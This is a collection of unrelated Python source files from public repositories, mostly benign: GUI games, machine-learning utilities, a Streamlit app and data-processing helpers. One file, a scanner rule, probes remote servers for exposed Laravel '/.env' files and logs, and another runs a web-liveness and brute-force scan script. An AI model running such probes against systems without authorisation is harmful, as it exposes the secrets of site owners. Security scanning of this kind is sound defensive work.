print(f\"Scanning angle {angle}\")\n\n # If the current angle is equal to any of the angles that were used to lock a zone\n if ils.checkIfResetPermitted(angle):\n # Reset that zone as the sonar has scanned that zone again, and no object is detect\n ils.resetInterlockZone(ils.findZone(angle))\n\n\n # print(f\"All currently locked zones: {ils.lockedZones}\")\n # print(f\"All zones locked angles: {ils.zoneLockedAngles}\")\n print(\"\")","repo_name":"EliasWR/RovRaspberry","sub_path":"DirectlyFromArduino/MainWorking.py","file_name":"MainWorking.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38552599225","text":"from tkinter import * ## notice lowercase 't' in tkinter here for python 3\nimport time\nimport random\nimport sys\nt = time.time()\n\nc=0;\nlim=10; #limit of how may dummy buttons there can be for c==6\ng=[0]*lim;# pre allocate g\nx=1 # starting value of x to create one dummy button\ndef rngp(): #Generates button positions on the widget \n win_w=root.winfo_width()\n win_h= root.winfo_height()\n w=button.winfo_width() \n h=button.winfo_height()\n w1=button1.winfo_width() \n h1=button1.winfo_height() \n rngp.n_x=random.uniform(0, win_w-w1-w)\n rngp.n_y=random.uniform(h, win_h-h1)\n \n \n \ndef callback():\n global c\n rngp() \n button1.place(y=rngp.n_y, x=rngp.n_x)\n \n if c == 0:\n button1.configure(text=\"Once More?\") \n elif 0< c < 5:\n button1.configure(text=\"Once again?\") \n elif c==5: # needs to be fixed\n button1.configure(text=\"Catch Me!!\") \n i=1\n while i<11: \n rngp()\n button1.place(y=rngp.n_y, x=rngp.n_x)\n print (i)\n #time.sleep(1), #Disabled until this level is fixed\n i+=1\n \n #trying to make the button change position while you try to click it, however\n #the button only shows its last position in the loop\n \n elif c==6: #needs to be tweaked\n button1.configure(text=\"is this the button?\")\n global x\n \n \n for i in range(0,x):\n makeframe()\n g[i]=makeframe.app\n button2=Button(g[i], text= \"is this the button!\",command=dup) \n button2.grid()\n #! instead of ? to distinguish the dummy buttons, change when completed\n\n #NEED TO MAKE SURE FRAMES DO NOT OVERLAP SO BUTTONS CAN BE CLEARLY PRESSED!!\n \n \n \n else: \n for i in range(0,x):\n g[i].destroy()\n \n button1.configure(text=\"Done for now\")\n button1['state'] = 'disabled'\n\n c=counter(c) \n \ndef des():\n root.destroy()\n sys.exit()\n \n \n #print(c)\n\ndef makeframe():\n #x=1;\n rngp()\n w1=button1.winfo_width() \n h1=button1.winfo_height()\n makeframe.app=Frame(root, height=h1, width=w1)\n makeframe.app.place(y=rngp.n_y, x=rngp.n_x)\n\n\ndef dup(): \n global x \n \n for i in range(0,x):\n g[i].destroy()\n\n x+=1\n\n if x>lim: #x=10 is the limit for now, once x>10, program closes\n button1.configure(text=\"You Lose!\")\n button1['state'] = 'disabled'\n\n else:\n print(x) #remove when level c==6 is completed\n rngp()\n button1.place(y=rngp.n_y, x=rngp.n_x)\n for i in range(0,x):\n makeframe()\n g[i]=makeframe.app\n button2=Button(g[i], text= \"is this the button!\",command=dup)\n button2.grid()\n\n \nroot=Tk()\nroot.title(\"My GUI\")\nroot.geometry(\"400x200\")\n\nbutton1=Button(root, text= \"Hello, Click me!\",command=callback)\nbutton1.place(y=100, x=200)\n\nbutton=Button(root, text=\"End\",command=des)\nbutton.place(rely=0, relx=1.0, x=0, y=0, anchor=NE)\n\ndef counter(c):\n c+=1\n return c\n\n\n\nelapsed= time.time()-t\n\n\n\n\n","repo_name":"PAchilleos/Python-Stuff","sub_path":"Question Mark/QM.py","file_name":"QM.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31643627271","text":"import json\nimport requests\n\n\ndef transliterate(text, reverse=False):\n symbols = (u\"абвгдежзийклмнопрстуфхцчшщъыьюяАБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\",\n u\"abvgdejzijklmnoprstufhzcss_y_uaABVGDEEJZIJKLMNOPRSTUFHZCSS_Y_EUA\")\n\n if reverse==True:\n tr = {ord(b):ord(a) for a, b in zip(*symbols)}\n else:\n tr = {ord(a):ord(b) for a, b in zip(*symbols)}\n return text.translate(tr)\n\ndef call_fast_api(data, endpoint, port=4990, action='GET', host = '127.0.0.1'):\n if not isinstance(data, str):\n data=json.dumps(data)\n \n api_url = f'http://{host}:{port}/{endpoint}'\n\n if action=='GET':\n response = requests.get(api_url, data=data)\n elif action=='POST':\n response = requests.post(api_url, data=data)\n \n if response.status_code == 200:\n return json.loads(response.content.decode('utf-8'))\n else:\n return response","repo_name":"md-experiments/translator_ui","sub_path":"translator_ui/source/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29817388955","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# tasks.py\nfrom xalive.app import app\nfrom .config import WA_PATH, PY_PATH, RS_PATH\nimport requests\nimport os\nimport time\nimport simplejson\nimport subprocess\nimport warnings\nwarnings.filterwarnings(action='ignore')\n\n\n\n# 需要使用一个装饰器,来管理该任务(函数)\n@app.task\ndef save_results(request):\n\tprint(request)\n\tresults = request.split(\"\\n\")\n\tfor sresults in results:\n\t\tsresult = sresults.split(\",\")\n\t\tif len(sresult) >= 5:\n\t\t\ttry:\n\t\t\t\tf = open('alive.csv','a')\n\t\t\t\tf.write(sresults + '\\n')\n\t\t\tfinally:\n\t\t\t\tf.close()\n\t\telif len(sresult) > 2:\n\t\t\ttry:\n\t\t\t\tf1 = open('brute.csv','a')\n\t\t\t\tf1.write(sresults + '\\n')\n\t\t\tfinally:\n\t\t\t\tf1.close()\n\treturn True\n\n\n@app.task(time_limit=10000)\ndef send_request(target):\n\ttarget0 = target.split(\"\\n\")\n\tresults = ''\n\tfor t0 in target0:\n\t\tcmd = [\"/root/xhunter-WebAlive/xalive/w.sh\",t0]\n\t\tprint(cmd)\n\t\ttry:\n\t\t\toutput = subprocess.check_output(cmd)\n\t\texcept:\n\t\t\treturn None\n\t\twith open(RS_PATH + '/results/alive_results.csv') as file:\n\t\t\tnext(file)\n\t\t\tfor line in file:\n\t\t\t\tresults += line\n\t\twith open(RS_PATH + '/results/brute_results.csv') as f:\n\t\t\tnext(f)\n\t\t\tfor line1 in f:\n\t\t\t\tresults += line1\n\treturn results","repo_name":"moonlight-junky/xhunter-WebAlive","sub_path":"xalive/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"29109671557","text":"import sys\nimport subprocess\nimport os\nimport logging\nfrom collections import defaultdict\nfrom argparse import ArgumentParser\n\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport yt.wrapper as yt\n\nsys.path.append('./proto')\nfrom realty.prediction.price_prediction_pb2 import PricePredictionResponse, PricePredictionLandingRequest\nfrom realty.offer import common_pb2, RealtySchema_pb2\nfrom realty import model_pb2\nfrom realty.offer.unified_offer_parts import address_part_pb2\nfrom google.protobuf.message import DecodeError\n\nyt.config[\"proxy\"][\"url\"] = \"hahn\"\n\nLOCALHOST = 'localhost:8895'\n\nlogging.basicConfig(\n format=u'[# %(levelname)-8s [%(asctime)s] %(message)s',\n level=logging.INFO\n)\n\n\ndef make_landing_message(row):\n message = PricePredictionLandingRequest()\n\n message.apartment.apartment_area = row[\"area\"]\n message.apartment.rooms_total = row[\"rooms_offered\"]\n # message.apartment.highrise_apartment_info.floors.append(data_nirvana[\"floor\"])\n message.apartment.general_apartment_info.ceiling_height.value = row['ceiling_height']\n message.apartment.building_info.built_year.value = row['build_year']\n message.apartment.building_info.flats_count.value = row['flats_count']\n message.apartment.building_info.expect_demolition.value = bool(row['expect_demolition'])\n message.apartment.building_info.has_lift.value = bool(row['has_elevator'])\n message.apartment.building_info.building_id.value = int(row['building_id'])\n message.apartment.building_info.building_series.id = row['building_series_id']\n message.apartment.building_info.building_type = row['building_type']\n message.apartment.building_info.floors_total.value = row['floors_total']\n\n message.location.geocoder_coordinates.latitude = row['lat']\n message.location.geocoder_coordinates.longitude = row['lon']\n\n c = address_part_pb2.Address.Component()\n c.region_type = model_pb2.RegionType.Value('CITY')\n c.value = row['locality_name']\n message.location.geocoder_address.component.append(c)\n message.location.geocoder_address.unified_oneline = row[\"unified_address\"]\n\n message.location.subject_federation_geoid = row[\"subject_federation_id\"]\n return message\n\n\ndef create_protobuf(row, protobuf_model=\"offer\"):\n request = RealtySchema_pb2.OfferMessage()\n request.ParseFromString(row[b'offer'])\n if protobuf_model == \"offer\":\n return request\n elif protobuf_model == \"landing\":\n data = {\n \"area\": request.transaction.area.value,\n \"rooms_offered\": request.apartmentInfo.roomsOffered,\n 'ceiling_height': request.apartmentInfo.ceilingHeight,\n 'build_year': request.buildingInfo.buildYear,\n 'flats_count': request.buildingInfo.flatsCount,\n 'expect_demolition': request.buildingInfo.expectDemolition,\n 'has_elevator': request.buildingInfo.new_model.has_lift.value or None,\n 'building_id': request.buildingInfo.buildingId,\n 'building_series_id': request.buildingInfo.buildingSeriesId,\n # 'building_type': request.buildingInfo.buildingTypeInt,\n 'building_type': request.buildingInfo.buildingTypeInt,\n 'floors_total': request.buildingInfo.new_model.building_type,\n 'lat': request.location.geocoderPoint.latitude,\n 'lon': request.location.geocoderPoint.longitude,\n 'locality_name': request.location.localityName,\n \"unified_address\": request.location.geocoderAddress,\n \"subject_federation_id\": request.location.subjectFederationId,\n }\n request = make_landing_message(data)\n else:\n raise ValueError(\"protobuf_model must be 'offer' or 'landing'\")\n return request\n\n\ndef write_request_proto_to_file(request, output_file='proto.request.example.binary'):\n global result\n result = request.SerializeToString()\n with open(output_file, 'w+b') as file:\n file.write(result)\n\n\ndef one_request_api(price_pred_request,\n request_filepath='proto.request.rent.example.binary',\n response_filepath='proto.response.rent.example.binary',\n hostname=LOCALHOST,\n path='get_price_offer',\n quantile_type=None) -> PricePredictionResponse:\n write_request_proto_to_file(price_pred_request, output_file=request_filepath)\n model_type = \"\"\n if quantile_type is not None:\n model_type = f\"?model_type={quantile_type}\"\n curl_call_string = f'curl -s --header \"Content-Type: application/protobuf\" --request POST --data-binary @{request_filepath} http://{hostname}/api/v2/{path}{model_type} > {response_filepath}'\n\n subprocess.check_call(curl_call_string, shell=True)\n\n price_resp = PricePredictionResponse()\n with open(response_filepath, 'r+b') as read_file:\n binary_string = read_file.read()\n price_resp.ParseFromString(binary_string)\n\n os.remove(request_filepath)\n return price_resp\n\n\ndef process_yt_offers(table_path, hostname, path, protobuf_model, data_path=None):\n logging.info(\"Start quality estimation\")\n logging.info(f\"table_path: {table_path}\")\n logging.info(f\"hostname: {hostname}\")\n logging.info(f\"path: {path}\")\n logging.info(f\"protobuf_model: {protobuf_model}\")\n iter_table = yt.read_table(\n table_path,\n format=yt.YsonFormat(encoding=None)\n )\n\n results = []\n for row in tqdm(iter_table):\n request = create_protobuf(row, protobuf_model)\n try:\n price_resp_plain = one_request_api(request,\n request_filepath='proto.request.sell.msc.example.binary',\n response_filepath='proto.response.sell.msc.example.binary',\n hostname=hostname,\n path=path)\n except DecodeError as e:\n logging.info(e)\n\n results.append({\n \"coarse_subject_id\": row[b'coarse_subject_id'],\n \"subject_id\": row[b'subject_id'],\n \"price\": row[b'price'],\n \"old_predicted_price\": row[b'predicted_price'],\n \"new_predicted_price\": price_resp_plain.predicted_price.value,\n \"new_predicted_q05\": price_resp_plain.predicted_price.q05,\n \"new_predicted_q25\": price_resp_plain.predicted_price.q25,\n \"new_predicted_q75\": price_resp_plain.predicted_price.q75,\n \"new_predicted_q95\": price_resp_plain.predicted_price.q95,\n })\n\n df_result = pd.DataFrame(results)\n df_result[\"old_mape\"] = np.abs(df_result[\"old_predicted_price\"] - df_result[\"price\"]) / df_result[\"price\"]\n df_result[\"new_mape\"] = np.abs(df_result[\"new_predicted_price\"] - df_result[\"price\"]) / df_result[\"price\"]\n df_result[\"q25_q75_weight\"] = ((df_result[\"price\"] > df_result[\"new_predicted_q25\"]) & \\\n (df_result[\"price\"] < df_result[\"new_predicted_q75\"])).astype(\"double\")\n df_result[\"q05_q95_weight\"] = ((df_result[\"price\"] > df_result[\"new_predicted_q05\"]) & \\\n (df_result[\"price\"] < df_result[\"new_predicted_q95\"])).astype(\"double\")\n\n result = df_result.groupby(\"coarse_subject_id\")[[\"old_mape\", \"new_mape\", \"q25_q75_weight\", \"q05_q95_weight\"]].mean()\n print(result)\n if data_path is not None:\n df_result.to_csv(data_path)\n\n\ndef read_args():\n parser = ArgumentParser()\n parser.add_argument(\"--path\", default=\"get_price_offer\")\n parser.add_argument(\"--hostname\", default=LOCALHOST)\n parser.add_argument(\"--table_path\")\n parser.add_argument(\"--data_path\", nargs='?')\n parser.add_argument(\"--protobuf_model\", default=\"offer\")\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n args = read_args()\n process_yt_offers(\n table_path=args.table_path,\n hostname=args.hostname,\n path=args.path,\n protobuf_model=args.protobuf_model,\n data_path=args.data_path\n )\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"classfields/test/quality_today_test.py","file_name":"quality_today_test.py","file_ext":"py","file_size_in_byte":8079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40286277319","text":"'''\nHow to program in Python - Chapter 13\nReading and priting a file.\n'''\n\nimport sys\n\ndef main():\n '''Main Function'''\n # open a file\n try:\n file = open('clients.dat', 'r')\n except IOError:\n print(\"file could not been opened\", file=sys.stderr)\n\n records = file.readlines()\n print(\"Account\".ljust(10), \"Name\".ljust(10), \"Balance\".rjust(10))\n\n for record in records:\n fields = record.split()\n print(fields[0].ljust(10), fields[1].ljust(10), fields[2].rjust(10))\n\n file.close()\n\n\nmain()\n","repo_name":"wesinalves/100daysofcodev2","sub_path":"codigos/cap13/reading_file.py","file_name":"reading_file.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31842178934","text":"import os\nimport argparse\n\nimport numpy as np\nimport PIL.Image as Image\n\n\nparser = argparse.ArgumentParser(\n description='Transfer TrainId To LabelId For Cityscapes')\nparser.add_argument('--pred-dir', type=str, default='',\n help='/path/to/segment/predictions.')\nparser.add_argument('--save-dir', type=str, default='',\n help='/path/to/saved/results.')\nargs = parser.parse_args()\n\nTRANSFORM_TB = [\n 7, 8, 11, 12, 13, 17, 19, 20, 21, 22,\n 23, 24, 25, 26, 27, 28, 31, 32, 33\n]\n\nif not os.path.isdir(args.save_dir):\n os.makedirs(args.save_dir)\nfor dirpath, dirnames, filenames in os.walk(args.pred_dir):\n for filename in filenames:\n predname = os.path.join(dirpath, filename)\n pred = np.asarray(\n Image.open(predname).convert(mode='L'),\n dtype=np.uint8)\n \n new_predname = predname.replace(args.pred_dir,\n args.save_dir)\n if not os.path.isdir(os.path.dirname(new_predname)):\n os.makedirs(os.path.dirname(new_predname))\n\n new_pred = np.zeros_like(pred)\n for train_id, label_id in enumerate(TRANSFORM_TB):\n new_pred[pred == train_id] = label_id\n\n Image.fromarray(new_pred, mode='L').save(new_predname)\n","repo_name":"twke18/Adaptive_Affinity_Fields","sub_path":"pyscripts/benchmark/encode_cityscapes_testid.py","file_name":"encode_cityscapes_testid.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"3"} +{"seq_id":"3378395857","text":"import streamlit as st\r\nimport pandas as pd\r\nimport pickle\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nimport seaborn as sns \r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\r\nfrom sklearn.compose import ColumnTransformer\r\nimport numpy as np\r\n\r\nst.title('Lead Scoring')\r\n### gif from url\r\nst.markdown(\"![Alt Text](https://thumbs.gfycat.com/FastMiserlyJellyfish.webp)\")\r\n\r\nst.header('The problem')\r\nst.write(\"\"\"An organization that offers a hiring assessment platform\r\n is looking to reduce it's annual marketing spending\"\"\")\r\nst.header('Approach')\r\nst.write(\"\"\"Build a sophisticated **Machine Learning model that predicts \r\nthe percentage probability** of marketing leads purchasing their product.This allows the company to be more precise with their marketing by targeting high probability customers. \"\"\")\r\nst.write(\"**Notes**:\")\r\nst.write(\"\"\"\\n 1. The data is from a Kaggle machine learning competition and anyone can download it: https://www.kaggle.com/parv619/hackerearths-reduce-marketing-waste\r\n\\n 2. This company has already aggregated a lot of data to reach this point that's why they have a success probability already,if your company has similar data \r\nwe are able to create a similar metric based on your dataset before employing the machine learning algorithm .\"\"\")\r\nst.header('Sample of the data')\r\n\r\n#reading in the data\r\n\r\ndef data_reader(path_full,path_clean):\r\n df = pd.read_csv(path_full)\r\n clean_df = pd.read_csv(path_clean,index_col=0)\r\n return df, clean_df \r\ndf, clean_df = data_reader('train.csv','cleaned_data.csv') \r\n\r\nst.dataframe(df.head(5))\r\n\r\nst.write(\"\"\" This is a snapshot of the clients in the dataset. The goal is to predict is the Success probability. This was provided in the dataset and goal is to be able to accurately\r\n predict this percentage\"\"\")\r\n\r\nst.header(\"Machine learning\")\r\nst.write(\"\"\"After extensive data cleaning and exploratory data analysis, the columns we included in our model were: \r\n **deal value, product pitched,lead revenue, fund category, country, state, hiring candidate role, lead source, internal point of contact, date of creation** \"\"\")\r\n\r\n\r\nfilename = 'grad_boost.sav'\r\nloaded_model = pickle.load(open(filename, 'rb'))\r\n\r\n\r\nst.header('What features were most important for our model? ')\r\nfeature_importance = pd.read_csv('feature_importance.csv',index_col=0)\r\n\r\n\r\nplot_imp = feature_importance.sort_values(by = 'Feature Importance',ascending=False).head(10)\r\nfig, ax = plt.subplots()\r\nsns.barplot(data = plot_imp, x ='Feature Importance', y = plot_imp.index )\r\nax.set_yticklabels(['India','USA','Internal Rating','Level 3 Meeting','Fund Category 1','Lead Source: Contact Email','Meeting level 1','Deal Value','Lead revenue 500Mil to 1 Bil','Lead Source Email'])\r\nst.pyplot(fig)\r\n\r\nst.write(\"\"\"Feature importances is simply showing the extent to which the model used each feature. These features are very specific to this business, so yours will look different. This information could be useful\r\n to a business when deciding how to act on the infomration from the model. \"\"\")\r\n\r\n\r\n\r\nst.header('Random Prediction')\r\nst.write(\"This has randomly selected one of the customers, now let's see how well the model does\")\r\n\r\n\r\nunclean_df = df[df.index.isin(clean_df.index)]\r\n\r\nclean_df.reset_index(inplace=True,drop=True)\r\nunclean_df.reset_index(inplace=True,drop=True)\r\nchosen_one = unclean_df.sample(1)\r\n\r\nchosen_one_index = chosen_one.index\r\n \r\n\r\nst.dataframe(chosen_one)\r\nactual =chosen_one.Success_probability\r\n\r\n\r\nc1,c2,c3= st.columns((1,1,1))\r\nwith c1:\r\n st.write('The answer we hope to get:🤞',actual)\r\n\r\n\r\n\r\ncat_cols = ['Industry',\r\n'Pitch',\r\n'Lead_revenue',\r\n'Fund_category',\r\n'Location',\r\n'Geography',\r\n'Hiring_candidate_role',\r\n'Lead_source',\r\n'Level_of_meeting',\r\n'Internal_POC']\r\n\r\n\r\n\r\n# columns transfomer and pipeline\r\nct = ColumnTransformer(\r\n [\r\n (\"cat_transformer\", OneHotEncoder(sparse=False),cat_cols),\r\n (\"num_transformer\", StandardScaler(),['Deal_value'])\r\n ]\r\n ,remainder = 'passthrough')\r\n\r\nall_prepped = ct.fit_transform(clean_df)\r\nchosen_prepped = all_prepped[chosen_one_index]\r\n\r\nprediction = loaded_model.predict(chosen_prepped)\r\nwith c2:\r\n st.write('Prediction:',prediction)\r\nwith c3:\r\n st.write('Error: ',abs(prediction - actual.values))\r\n st.write('This should be quite small, on average our model only had an error of 0.22 on unseen data')\r\nst.write('**Refresh the page for a new customer**')\r\nst.header('What next ?')\r\nst.write(\"\"\"In this case the model gives us a success probability and we would now use our model on \r\nnew clients where we have not already calculated the success probability and this should save the company money on marketing \r\nand also give them some more insights into their product.\r\n\"\"\")\r\n","repo_name":"andersonbolusherbst/leadscoring","sub_path":"streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30426870405","text":"from core.redis import rds\nfrom core.triage import Triage\nfrom core.parser import ScanParser\n\nclass Rule:\n def __init__(self):\n self.rule = 'CFG_823E'\n self.rule_severity = 3\n self.rule_description = 'This rule checks for misconfigurations in Laravel'\n self.rule_confirm = 'Remote Server Misconfigured Laravel'\n self.rule_mitigation = '''Laravel has been misconfigured and may leak environment or log data. \\\nUse the Laravel Hardening Guidelines for reference: https://laravel.com/docs/7.x/configuration'''\n self.rule_details = ''\n self.rule_match_string = {\n '/storage/logs/laravel.log':{\n 'app':'LARAVEL_FRAMEWORK_LOG',\n 'match':['Stack trace', 'Did you mean one of these?', 'ConsoleOutput'],\n 'title':'Laravel Framework Log'\n },\n '/.env':{\n 'app':'LARAVEL_FRAMEWORK_ENV',\n 'match':['MIX_PUSHER_APP_KEY', 'BROADCAST_DRIVER'],\n 'title':'Laravel Framework Env File'\n },\n }\n self.intensity = 1\n \n \n\n def check_rule(self, ip, port, values, conf):\n t = Triage()\n p = ScanParser(port, values)\n \n module = p.get_module()\n domain = p.get_domain()\n \n if 'http' not in module:\n return\n \n for uri, values in self.rule_match_string.items():\n app_title = values['title']\n \n resp = t.http_request(ip, port, uri=uri)\n \n if resp is not None:\n for match in values['match']:\n if match in resp.text:\n self.rule_details = 'Laravel Misconfiguration - {} at {}'.format(app_title, resp.url)\n rds.store_vuln({\n 'ip':ip,\n 'port':port,\n 'domain':domain,\n 'rule_id':self.rule,\n 'rule_sev':self.rule_severity,\n 'rule_desc':self.rule_description,\n 'rule_confirm':self.rule_confirm,\n 'rule_details':self.rule_details,\n 'rule_mitigation':self.rule_mitigation\n })\n return","repo_name":"PaytmLabs/nerve","sub_path":"rules/configuration/rule_laravel.py","file_name":"rule_laravel.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":422,"dataset":"github-code","pt":"3"} +{"seq_id":"27342371066","text":"def factorial_recursion(n):\n if n == 1:\n return 1\n return n * factorial_recursion(n-1)\n \n\ndef factorial_iterative(n):\n answer = 1\n while n > 1:\n answer = answer*n \n n = n - 1\n return answer\n\n\n# print (factorial_iterative(5))\n# print (factorial_recursion(3))\n\n# 0 ,1 , 1, 2, 3, 5, 8, 13, 21\n\ndef fibonacci_recur(n):\n if n < 2:\n return n \n \n return fibonacci_recur(n-1) + fibonacci_recur(n-2)\n\ndef fibonacci_iter(n):\n if n == 1 or n == 2:\n return 1\n first = 0 \n second = 1\n i = 1\n result = 0\n while i < n:\n result = first+second\n first = second\n second = result\n i += 1\n return result\n\n# print(fibonacci_iter(1))\n# print(fibonacci_recur(1))\n\n\n\n\n \n\n\n\n","repo_name":"abhijaini/DataStructures-and-Algorithms","sub_path":"Algorithms/Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74195553680","text":"import numpy as np\nimport pandas as pd\n\n\ndef fmtest():\n print(\"test test\")\n\n\ndef outlierLowMembership(val, o15, o30):\n if val < o30:\n return 1\n membershipValue = (o15-val)/(o15-o30)\n return membershipValue\n\n\ndef outlierHighMembership(val, o15, o30):\n if val > o30:\n return 1\n membershipValue = (val-o15)/(o30-o15)\n return membershipValue\n\n\ndef outlierRegression(x, y):\n X = np.sort(x)\n q25 = np.quantile(X, 0.25)\n q75 = np.quantile(X, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n outliers = []\n for xo in x:\n if xo > outlierHigher15 or xo < outlierLower15:\n outliers.append(1)\n continue\n outliers.append(0)\n Y = np.sort(y)\n q25 = np.quantile(Y, 0.25)\n q75 = np.quantile(Y, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n for yi in range(len(y)):\n if y[yi] > outlierHigher15 or y[yi] < outlierLower15:\n outliers[yi] = 1\n return outliers\n\n\ndef findOutliersIn(dataArray):\n newObjects = []\n for valueArray in dataArray:\n valueArrayNew = list(map(lambda v: float(v), valueArray))\n valueArrayNew = np.array(valueArrayNew)\n valueArrayNew = np.sort(valueArrayNew)\n q25 = np.quantile(valueArrayNew, 0.25)\n q75 = np.quantile(valueArrayNew, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n objectSet = {}\n objectSet[\"ol15\"] = outlierLower15\n objectSet[\"oh15\"] = outlierHigher15\n objectSet[\"ol30\"] = outlierLower30\n objectSet[\"oh30\"] = outlierHigher30\n outlierArray = []\n membershipsArray = []\n for v in valueArray:\n on = outlierNumber(v, outlierLower15, outlierHigher15)\n outlierArray.append(on)\n if on == 1:\n membershipsArray.append(outlierLowMembership(\n float(v), float(outlierLower15), float(outlierLower30)))\n if on == 2:\n membershipsArray.append(outlierHighMembership(\n float(v), float(outlierHigher15), float(outlierHigher30)))\n if on == 0:\n membershipsArray.append(0)\n objectSet[\"outlierArray\"] = outlierArray\n objectSet[\"membershipsArray\"] = membershipsArray\n newObjects.append(objectSet)\n outlierArray = newObjects[0][\"outlierArray\"]\n membershipsArray = newObjects[0][\"membershipsArray\"]\n for a in newObjects:\n for oi in range(len(a[\"outlierArray\"])):\n if a[\"outlierArray\"][oi] != 0:\n outlierArray[oi] = a[\"outlierArray\"][oi]\n if a[\"membershipsArray\"][oi] != 0:\n membershipsArray[oi] = a[\"membershipsArray\"][oi]\n return {\n \"o\": outlierArray,\n \"m\": membershipsArray\n }\n\n\ndef outlierNumber(num, lb, hb):\n if float(num) > hb:\n return 2\n if float(num) < lb:\n return 1\n return 0\n\n\ndef outlierFuzzy(data):\n newObjects = []\n for objectSet in data:\n isNumber = True\n for o in objectSet[\"values\"]:\n if is_int(o[\"value\"]) == False and is_float(o[\"value\"]) == False:\n isNumber = False\n break\n if (isNumber):\n objectArray = list(\n map(lambda os: float(os[\"value\"]), objectSet[\"values\"]))\n objectArray = np.array(objectArray)\n objectArray = np.sort(objectArray)\n q25 = np.quantile(objectArray, 0.25)\n q75 = np.quantile(objectArray, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n objectSet[\"ol15\"] = outlierLower15\n objectSet[\"oh15\"] = outlierHigher15\n objectSet[\"ol30\"] = outlierLower30\n objectSet[\"oh30\"] = outlierHigher30\n for o in objectSet[\"values\"]:\n o[\"outlier\"] = outlierNumber(\n o[\"value\"], outlierLower15, outlierHigher15)\n newObjects.append(objectSet)\n return newObjects\n\n\ndef is_float(element: any) -> bool:\n if element is None:\n return False\n try:\n float(element)\n return True\n except ValueError:\n return False\n\n\ndef is_int(element: any) -> bool:\n if element is None:\n return False\n try:\n int(element)\n return True\n except ValueError:\n return False\n\n\ndef makeDynamic(data):\n newData = []\n names = []\n keyNames = []\n dateName = None\n fdict = {}\n for objectSet in data:\n if (objectSet[\"key\"]):\n keyNames.append(objectSet[\"title\"])\n else:\n if (objectSet[\"date\"]):\n dateName = objectSet[\"title\"]\n else:\n names.append(objectSet[\"title\"])\n v = list(map(lambda v: v[\"value\"], objectSet[\"values\"]))\n fdict[objectSet[\"title\"]] = v\n df = pd.DataFrame(fdict)\n uniqueNames = df[keyNames[0]].unique()\n dfNew = pd.DataFrame({})\n for name in uniqueNames:\n dfTemp = pd.DataFrame({})\n dfTemp = df[df[keyNames[0]] == name].reset_index(drop=True)\n dfTemp[dateName] = dfTemp[dateName].astype(float)\n minDate = dfTemp[dateName].min()\n minDateIndex = dfTemp[dfTemp[dateName] == minDate].index.item()\n for restName in names:\n dfTemp[restName] = (dfTemp[restName]).astype(float)\n dfTemp[restName] = dfTemp[restName] - \\\n float(dfTemp[restName][minDateIndex])\n dfNew = pd.concat([dfNew, dfTemp], ignore_index=True)\n for restName in names:\n dfNew[restName] = np.where(\n dfNew[restName] < 0, dfNew[restName]/abs(dfNew[restName].min()), dfNew[restName])\n dfNew[restName] = np.where(\n dfNew[restName] > 0, dfNew[restName]/dfNew[restName].max(), dfNew[restName])\n for dataset in data:\n newVals = dfNew[dataset[\"title\"]].values.tolist()\n newValuesFull = []\n for dpi in range(len(dataset[\"values\"])):\n val = dataset[\"values\"][dpi]\n val[\"value\"] = newVals[dpi]\n newValuesFull.append(val)\n dataset[\"values\"] = newValuesFull\n newData.append(dataset)\n return newData\n\n\n# async def correlations():\n# if request.method == 'POST':\n# content = request.json\n# dfData = {}\n# for nameIndex in range(len(content[\"fields\"])):\n# dfData[content[\"fields\"][nameIndex]] = list(\n# np.float_(content[\"data\"][nameIndex]))\n# pd.set_option('display.max_colwidth', 0)\n# df = pd.DataFrame(data=dfData)\n# return {\n# \"status\": \"ok\",\n# \"corr\": df.corr().to_numpy().tolist(),\n# \"headers\": {\"Access-Control-Allow-Origin\": \"*\"}\n# }\n# return {\n# \"status\": \"error\",\n# \"headers\": {\"Access-Control-Allow-Origin\": \"*\"}\n# 